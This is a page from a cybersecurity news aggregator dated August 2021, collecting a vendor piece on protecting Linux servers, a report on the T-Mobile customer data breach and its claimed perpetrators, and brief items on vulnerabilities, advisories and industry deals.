Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for How and why to prote ...

 Business

Until recently, large swaths of the IT community were convinced that Linux machines didn’t need protection — that the system’s architecture, being intrinsically near invulnerable, held no interest for attackers, and the very ideology of open-source code served as a kind of guarantee against unexpected,   show more ...

serious vulnerabilities. In recent years, however, even hardheaded infosec officers have come to realize such statements have little basis in fact. Threats to Linux servers As long as cybercrime was focused solely on making money at end users’ expense, Linux servers were indeed relatively safe. But modern cybercriminals set their sights on business, with its greater potential for much bigger payouts, long ago. And that is where the various Linux builds have come under serious scrutiny. After all, a server is of strategic interest to any attacker regardless of purpose, be it espionage, sabotage, or ordinary ransomware distribution. You don’t have to look far or wide for examples. Last November, our experts found a modification of the RansomEXX Trojan that could encrypt data on Linux machines. Tailored for targeted attacks on specific organizations (the code and ransom note are customized for each new target), the Trojan was already in use at the time of discovery. DarkRadiation ransomware, detected this summer, is purpose-built for attacks on Red Hat/CentOS and Debian Linux, and it can stop all Docker containers on affected machines. The malware is written entirely in a Bash script, and it uses a Telegram messenger API to communicate with C&C servers. Almost every modern APT group has backdoors, rootkits, or exploit code for Linux. Our Global Research & Analysis Team (GReAT) published a study of the latest APT tools targeting Linux machines. Although the open-source community carefully studies distributions, collectively discusses vulnerabilities, and releases information about them responsibly (most of the time), administrators don’t always update their Linux servers. Many still figure, “if it ain’t broke, don’t fix it.” That philosophy prevails despite some vulnerabilities being quite serious. For example, cybercriminals can use CVE-2021-3560, found in the polkit system service (installed by default in many Linux distributions) and published in June of 2021, for privilege escalation. The vulnerability received a score of 7.8 out of 10 on the CVSS v3 scale. How to secure Linux servers Kaspersky Endpoint Security for Linux has long protected users from such problems. However, with the rising number of attacks on servers running on Linux, we decided to update our solution with a number of new technologies. First, the solution now features full Application Control (a technology for running only those applications in the trusted list, or blocking those in the untrusted list). To help users configure this module, we added features to inventory executable programs and define custom categories. That ensures highly effective protection against a very wide range of threats. Second, the time had come to strengthen the system’s antiransomware capability (malware of this type is now detected by its behavior). We are also aware that a significant share of Linux machines are cloud servers, not physical machines running in clients’ offices. Moreover, thanks to the development of containerization technologies, it is now possible to run applications in containers, enabling admins to solve scalability issues, increasing application stability, and improving computing resource efficiency. Therefore, we focused on scenarios for deploying the solution in public clouds and protecting containerization platforms (Docker, Podman, Cri-O, and Runc). Those apply to both threat detection mode for launched containers, enabling techs to identify particular containers containing threats and specifying paths to malicious files (in a runtime environment), and as a service for checking container images on demand (both local and located in repositories). In the latter scenario, it is possible to launch Kaspersky Endpoint Security for Linux inside a Docker container and use it to scan other containers for threats using the RESTful API, which serves to automate the tasks of scanning container images, for example, in the CI/CD pipeline. Users now have more than one option for managing the protection of servers and container loads in public clouds such as Microsoft Azure, AWS, Google Cloud, and Yandex Cloud. The first is through the console, whether in an in-house data center or in a public cloud. The second is through the Kaspersky Security Center Cloud Console, deployed and supported by us, leaving the administrator free to focus on managing the protection of their infrastructure. Kaspersky Endpoint Security for Linux is part of the Kaspersky Hybrid Cloud solutions suite. It integrates with the Kaspersky Managed Detection and Response service, which handles the particularly dangerous cyberthreats that can bypass automatic barriers.

image for T-Mobile Investigati ...

 Data Breaches

Communications giant T-Mobile said today it is investigating the extent of a breach that hackers claim has exposed sensitive personal data on 100 million T-Mobile USA customers, in many cases including the name, Social Security number, address, date of birth, phone number, security PINs and details that uniquely   show more ...

identify each customer’s mobile device. On Sunday, Vice.com broke the news that someone was selling data on 100 million people, and that the data came from T-Mobile. In a statement published on its website today, the company confirmed it had suffered an intrusion involving “some T-Mobile data,” but said it was too soon in its investigation to know what was stolen and how many customers might be affected. A sales thread tied to the allegedly stolen T-Mobile customer data. “We have determined that unauthorized access to some T-Mobile data occurred, however we have not yet determined that there is any personal customer data involved,” T-Mobile wrote. “We are confident that the entry point used to gain access has been closed, and we are continuing our deep technical review of the situation across our systems to identify the nature of any data that was illegally accessed,” the statement continued. “This investigation will take some time but we are working with the highest degree of urgency. Until we have completed this assessment we cannot confirm the reported number of records affected or the validity of statements made by others.” The intrusion came to light on Twitter when the account @und0xxed started tweeting the details. Reached via direct message, Und0xxed said they were not involved in stealing the databases but was instead in charge of finding buyers for the stolen T-Mobile customer data. Und0xxed said the hackers found an opening in T-Mobile’s wireless data network that allowed access to two of T-Mobile’s customer data centers. From there, the intruders were able to dump a number of customer databases totaling more than 100 gigabytes. They claim one of those databases holds the name, date of birth, SSN, drivers license information, plaintext security PIN, address and phone number of 36 million T-Mobile customers in the United States — all going back to the mid-1990s. The hacker(s) claim the purloined data also includes IMSI and IMEI data for 36 million customers. These are unique numbers embedded in customer mobile devices that identify the device and the SIM card that ties that customer’s device to a telephone number. “If you want to verify that I have access to the data/the data is real, just give me a T-Mobile number and I’ll run a lookup for you and return the IMEI and IMSI of the phone currently attached to the number and any other details,” @und0xxed said. “All T-Mobile USA prepaid and postpaid customers are affected; Sprint and the other telecoms that T-Mobile owns are unaffected.” Other databases allegedly accessed by the intruders included one for prepaid accounts, which had far fewer details about customers. “Prepaid customers usually are just phone number and IMEI and IMSI,” Und0xxed said. “Also, the collection of databases includes historical entries, and many phone numbers have 10 or 20 IMEIs attached to them over the years, and the service dates are provided. There’s also a database that includes credit card numbers with six digits of the cards obfuscated.” T-Mobile declined to comment beyond what the company said in its blog post today. In 2015, a computer breach at big three credit bureau Experian exposed the Social Security numbers and other data on 15 million people who applied for financing from T-Mobile. Like other mobile providers, T-Mobile is locked in a constant battle with scammers who target its own employees in SIM swapping attacks and other techniques to wrest control over employee accounts that can provide backdoor access to customer data. In at least one case, retail store employees were complicit in the account takeovers. WHO HACKED T-MOBILE? The Twitter profile for the account @Und0xxed includes a shout out to @IntelSecrets, the Twitter account of a fairly elusive hacker who also has gone by the handles IRDev and V0rtex. Asked if @IntelSecrets was involved in the T-Mobile intrusion, @und0xxed confirmed that it was. The IntelSecrets nicknames correspond to an individual who has claimed responsibility for modifying the source code for the Mirai “Internet of Things” botnet to create a variant known as “Satori,” and supplying it to others who used it for criminal gain and were later caught and prosecuted. Like Kenny “NexusZeta” Schuchmann, who pleaded guilty in 2019 to operating the Satori botnet. Two other young men have been charged in connection with Satori — but not IntelSecrets. How do we know all this about IntelSecrets/IRDev/V0rtex? That identity has acknowledged as much in a series of bizarre lawsuits filed by a person who claims their real name is John Erin Binns. The same Binns identity operates the website intelsecrets[.]su.  On that site, Binns claims he fled to Germany and Turkey to evade prosecution in the Satori case, only to be kidnapped in Turkey and subjected to various forms of psychological and physical torture. According to Binns, the U.S. Central Intelligence Agency (CIA) falsely told their counterparts in Turkey that he was a supporter or member of the Islamic State (ISIS), a claim he says led to his alleged capture and torture by the Turks. Since then, Binns has filed a flood of lawsuits naming various federal agencies — including the FBI, the CIA, and the U.S. Special Operations Command (PDF), demanding that the government turn over information collected about him and seeking restitution for his alleged kidnapping at the hands of the CIA. Speaking to the researcher Alon Gal (@underthebreach), the hackers responsible for the T-Mobile intrusion said they did it to “retaliate against the US for the kidnapping and torture of John Erin Binns in Germany by the CIA and Turkish intelligence agents in 2019. We did it to harm US infrastructure.”

image for Connecting The Dots: ...

 cybercrime

The question of whether or not Russia has been involved in ongoing cybercrime is on the minds of many. A new report by Analyst1 offers new intelligence on the matter. The post Connecting The Dots: The Kremlin’s Links to Cyber Crime appeared first on The Security Ledger with Paul F. Roberts. Related StoriesEpisode   show more ...

217: What Fighting Pirates Teaches Us About RansomwareEpisode 218: Denial of Sustenance Attacks -The Cyber Risk To AgricultureEpisode 222: US Rep. Himes on Congress’s About-face on Cybersecurity

 Trends, Reports, Analysis

The London High Court has ordered the cryptocurrency exchange Binance to attempt to identify and freeze accounts belonging to the attackers who allegedly stole about $2.6 million from Fetch.ai.

 Trends, Reports, Analysis

Research shows that the cost of phishing attacks has nearly quadrupled over the past six years: Large U.S. companies are now losing, on average, $14.8 million annually, or $1,500 per employee.

 Malware and Vulnerabilities

Red Hat gave the problem in its Common Vulnerability Scoring System (CVSS) a score of 7.5, which is "high." An attack using it would be easy to build and requires no privileges to be made.

 Companies to Watch

Cisco announced on Friday that it has signed a deal to acquire observability company Epsagon. Cisco said the deal will play a key role in helping it ramp up its full-stack observability strategy.

 Companies to Watch

Baffle announced that it has raised $20 million in Series B funding led by new investor Celesta Capital, with contributions and follow-on investments from multiple investors.

 Laws, Policy, Regulations

The Federal Financial Institutions Examination Council (FFIEC) has issued updated its security guidance advising banks to use stronger access controls and multifactor authentication.

 Feed

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals   show more ...

to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs). This is the source code release.

 Feed

Red Hat Security Advisory 2021-3181-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include bypass and out of bounds write vulnerabilities.

 Feed

Red Hat Security Advisory 2021-3172-01 - EDK is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Issues addressed include a buffer overflow vulnerability.

 Feed

Red Hat Security Advisory 2021-3178-01 - The System Security Services Daemon service provides a set of daemons to manage access to remote directories and authentication mechanisms. It also provides the Name Service Switch and the Pluggable Authentication Modules interfaces toward the system, and a pluggable back-end   show more ...

system to connect to multiple different account sources. Issues addressed include a code execution vulnerability.

 Feed

Red Hat Security Advisory 2021-3177-01 - The cloud-init packages provide a set of init scripts for cloud instances. Cloud instances need special scripts to run during initialization to retrieve and install SSH keys, and to let the user run various scripts.

 Feed

Taiwanese chip designer Realtek is warning of four security vulnerabilities in three software development kits (SDKs) accompanying its WiFi modules, which are used in almost 200 IoT devices made by at least 65 vendors. The flaws, which affect Realtek SDK v2.x, Realtek "Jungle" SDK v3.0/v3.1/v3.2/v3.4.x/v3.4T/v3.4T-CT, and Realtek "Luna" SDK up to version 1.3.2, could be abused by attackers to

 Feed

A new social engineering-based malvertising campaign targeting Japan has been found to deliver a malicious application that deploys a banking trojan on compromised Windows machines to steal credentials associated with cryptocurrency accounts. The application masquerades as an animated porn game, a reward points application, or a video streaming application, Trend Micro researchers Jaromir

 Feed

The Incident Response (IR) services market is in accelerated growth due to the rise in cyberattacks that result in breaches. More and more organizations, across all sizes and verticals, choose to outsource IR to 3rd party service providers over handling security incidents in-house. Cynet is now launching a first-of-its-kind offering, enabling any Managed Security Provider (MSP) or Security

2021-08
Aggregator history
Tuesday, August 17
SUN
MON
TUE
WED
THU
FRI
SAT
AugustSeptemberOctober